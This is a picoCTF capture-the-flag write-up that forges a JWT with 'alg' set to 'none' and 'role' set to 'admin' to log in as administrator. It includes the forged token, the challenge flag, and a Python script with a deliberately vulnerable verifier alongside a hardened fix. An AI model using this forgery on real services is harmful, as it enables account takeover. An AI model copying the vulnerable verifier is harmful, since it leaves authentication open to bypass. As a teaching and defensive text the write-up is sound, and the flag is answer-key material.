---

### Challenge Description

Most web application developers use third party components without testing their security. Can you identify the components and exploit the vulnerable one? The website is running at http://saturn.picoctf.net:52680/. Can you become an `admin`? You can login as `test` with the password `Test123!` to get started.

---

### Summary

This challenge exposes a JWT verification flaw: the server honours whatever `alg` the token header names, so a token whose header sets `alg` to `none` is accepted without any signature check. An attacker can decode the session token, change the `role` claim from `user` to `admin`, drop the signature, and authenticate as the administrator to capture the flag.

---

### Enumerate the Webpage

Here's the homepage:

![[images/Pasted image 20230830163236.png]]
<p style="text-align:center;"><i>Figure 1: Login page for "Our Bank"</i></p>

The challenge description says we can log in with `test:Test123!`, so I log in with those credentials and get the following page:

![[images/Pasted image 20230830163258.png]]
<p style="text-align:center;"><i>Figure 2: Landing page for "Our Bank"</i></p>

Let's inspect the website's cookies. The session cookie, `token`, holds the following value:

![[images/Pasted image 20230902131806.png]]

```
eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJhdXRoIjoxNjkyNjQyMjc3NTc1LCJhZ2VudCI6Ik1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDEwLjA7IFdpbjY0OyB4NjQ7IHJ2OjEwOS4wKSBHZWNrby8yMDEwMDEwMSBGaXJlZm94LzExNi4wIiwicm9sZSI6InVzZXIiLCJpYXQiOjE2OTI2NDIyNzh9.c11JfHx8fdsgrwb8nK6Sf-HI3UJ-DgEiKHjNtHj3eF8
```
<p style="text-align:center;"><i>Figures 3-4: Token cookie from "Our Bank"</i></p>

Three base64url segments separated by dots (header, payload, signature) is the shape of a JSON Web Token; let's decode it and view its contents:

![[images/Pasted image 20230902133330.png]]
<p style="text-align:center;"><i>Figure 5: Decoded <a href='https://token.dev/'>JSON Web Token</a></i></p>

The header is `{"typ":"JWT","alg":"HS256"}`, so the token claims to be signed with HMAC-SHA256, and the payload carries `auth`, `agent`, `role` and `iat` claims, with `role` currently set to `user`. JWTs are widely used for stateless web authentication, and the format itself is sound; the danger lies in how the server verifies them. A verifier that lets the token's own header decide which algorithm to use, or whether to check the signature at all, can be talked into accepting a forged token.

---

### Exploit the JWT

RFC 7519 defines an "unsecured" JWT: the header sets `alg` to `none` and the signature segment is empty. A verifier that accepts whichever algorithm the header names will treat such a token as valid without ever checking a signature.
This allows an attacker to modify the token's claims without knowing the key used to sign it: with `alg` set to `none`, the server never checks a signature. The goal of the challenge is to log in as `admin`, so let's change the `role` claim to `admin` and the `alg` to `none`:

![[images/Pasted image 20230902133422.png]]

```
eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.eyJhdXRoIjoxNjkyNjQyMjc3NTc1LCJhZ2VudCI6Ik1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDEwLjA7IFdpbjY0OyB4NjQ7IHJ2OjEwOS4wKSBHZWNrby8yMDEwMDEwMSBGaXJlZm94LzExNi4wIiwicm9sZSI6ImFkbWluIiwiaWF0IjoxNjkyNjQyMjc4fQ.
```
<p style="text-align:center;"><i>Figures 6-7: Modified the JWT to authenticate as the admin user</i></p>

Note that the forged JWT must still end with a period: the third segment (the signature) is empty, but the separator has to be present, or the token is rejected as malformed and authentication fails.

Modify the `token` cookie with our newly crafted JWT:

![[images/Pasted image 20230902133502.png]]
<p style="text-align:center;"><i>Figure 8: Updated the cookie to use our modified JWT</i></p>

Reloading the page authenticates you as an admin:

![[images/Pasted image 20230902133612.png]]
<p style="text-align:center;"><i>Figure 9: Authenticated as the admin user</i></p>

Flag: `picoCTF{succ3ss_@u7h3nt1c@710n_3444eacf}`
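The decode-and-forge steps above, reproduced as an added example using only the Python standard library. This is not the challenge's code or picoCTF's: `SERVER_KEY` is a placeholder (the real signing key is unknown, which is the whole point of the attack), and `verify_vulnerable` and `verify_hardened` are illustrative verifiers written for this example, not the challenge server's logic. It also goes a step beyond the writeup by showing why the forgery works: a verifier that dispatches on the header's `alg` accepts the unsigned token, while one that pins HS256 rejects it.

```python
"""Decode, forge and verify JWTs with only the Python standard library.

Added example for this writeup, not code from the challenge or from picoCTF.
SERVER_KEY is a made-up placeholder (the real key is unknown); it exists only to
show how a correct verifier rejects the forged token.
"""
import base64
import hashlib
import hmac
import json
from typing import Optional, Tuple

# The `token` cookie captured from the challenge after logging in as test.
CAPTURED_TOKEN = "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJhdXRoIjoxNjkyNjQyMjc3NTc1LCJhZ2VudCI6Ik1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDEwLjA7IFdpbjY0OyB4NjQ7IHJ2OjEwOS4wKSBHZWNrby8yMDEwMDEwMSBGaXJlZm94LzExNi4wIiwicm9sZSI6InVzZXIiLCJpYXQiOjE2OTI2NDIyNzh9.c11JfHx8fdsgrwb8nK6Sf-HI3UJ-DgEiKHjNtHj3eF8"

SERVER_KEY = b"placeholder-key-not-the-real-one"  # assumption: real key unknown


def b64url_decode(segment: str) -> bytes:
    """base64url without padding, as JWS segments are encoded (RFC 7515)."""
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def compact_json(obj: dict) -> bytes:
    # No whitespace, matching the compact JSON in the captured token.
    return json.dumps(obj, separators=(",", ":")).encode()


def decode_jwt(token: str) -> Tuple[dict, dict, bytes]:
    """Split a compact JWS into (header, payload, raw signature). No verification."""
    header_b64, payload_b64, sig_b64 = token.split(".")
    return (json.loads(b64url_decode(header_b64)),
            json.loads(b64url_decode(payload_b64)),
            b64url_decode(sig_b64))


def sign_hs256(header: dict, payload: dict, key: bytes) -> str:
    """Issue a properly signed HS256 token (what the server should be doing)."""
    signing_input = b64url_encode(compact_json(header)) + "." + b64url_encode(compact_json(payload))
    sig = hmac.new(key, signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + b64url_encode(sig)


def forge_none_token(token: str, **claims) -> str:
    """Re-encode `token` with alg=none, the given claims overridden, and an empty signature."""
    header, payload, _ = decode_jwt(token)
    header["alg"] = "none"
    payload.update(claims)
    # The trailing "." is the empty third segment; drop it and the token will not parse.
    return b64url_encode(compact_json(header)) + "." + b64url_encode(compact_json(payload)) + "."


def verify_vulnerable(token: str, key: bytes) -> Optional[dict]:
    """Trusts the token header to pick the algorithm: the bug class this challenge exploits."""
    header_b64, payload_b64, _ = token.split(".")
    header, payload, sig = decode_jwt(token)
    if header.get("alg") == "none":
        return payload  # unsigned token accepted as-is
    if header.get("alg") == "HS256":
        expected = hmac.new(key, f"{header_b64}.{payload_b64}".encode(), hashlib.sha256).digest()
        return payload if hmac.compare_digest(expected, sig) else None
    return None


def verify_hardened(token: str, key: bytes) -> Optional[dict]:
    """Pins the algorithm server-side; the header's alg is checked, never obeyed."""
    header_b64, payload_b64, _ = token.split(".")
    header, payload, sig = decode_jwt(token)
    if header.get("alg") != "HS256":
        return None
    expected = hmac.new(key, f"{header_b64}.{payload_b64}".encode(), hashlib.sha256).digest()
    return payload if hmac.compare_digest(expected, sig) else None


if __name__ == "__main__":
    header, payload, _ = decode_jwt(CAPTURED_TOKEN)
    print("header :", header)
    print("payload:", payload)
    forged = forge_none_token(CAPTURED_TOKEN, role="admin")
    print("forged :", forged)
    print("vulnerable verifier ->", verify_vulnerable(forged, SERVER_KEY))
    print("hardened verifier   ->", verify_hardened(forged, SERVER_KEY))
```

Running it prints the decoded header and payload and a forged token that matches the one pasted above byte for byte, because the claims are re-serialised as compact JSON in their original key order. The server-side fix is the `verify_hardened` pattern: hard-code the accepted algorithm (with PyJWT, pass `algorithms=["HS256"]` to `jwt.decode`) and never let the token choose.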